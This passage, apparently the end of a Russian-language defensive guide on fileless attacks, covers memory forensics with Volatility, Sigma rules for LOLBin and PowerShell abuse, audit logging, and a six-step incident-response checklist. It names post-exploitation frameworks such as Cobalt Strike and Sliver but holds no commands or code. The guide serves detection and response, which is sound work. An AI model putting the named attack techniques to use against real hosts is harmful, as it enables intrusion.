  • Memory forensics: анализ дампа оперативной памяти с помощью Volatility Framework для обнаружения инжектированного кода и скрытых процессов.
  • Sigma-правила: готовые правила для SIEM, покрывающие типичные LOLBin-техники и подозрительные запуски PowerShell.
Дополнение: Бесфайловые техники — основа большинства современных APT-атак и пост-эксплуатационных фреймворков (Cobalt Strike, Metasploit, Sliver). Основная тактика обнаружения — поведенческий анализ: цепочки процессов, аргументы командной строки, обращения к памяти чужих процессов. Обязательно включите расширенный аудит (PowerShell Script Block Logging + Sysmon) как в тестовой среде, так и на продакшн-системах.
🛡️ Реагирование:
  1. Не перезагружайте хост — вредоносный код находится в памяти и будет утерян для анализа. Снимите дамп памяти.
  2. Изолируйте хост от сети для прекращения связи с C2.
  3. Проанализируйте цепочку процессов: какой процесс инициировал вредоносную активность (Sysmon Event ID 1).
  4. Проверьте механизмы персистентности: WMI-подписки, ключи реестра, запланированные задачи — удалите их.
  5. Оцените масштаб: проверьте другие хосты на аналогичные IoC (beaconing, аномальные запуски PowerShell).
  6. Эскалируйте инцидент — fileless-техники указывают на продвинутого противника.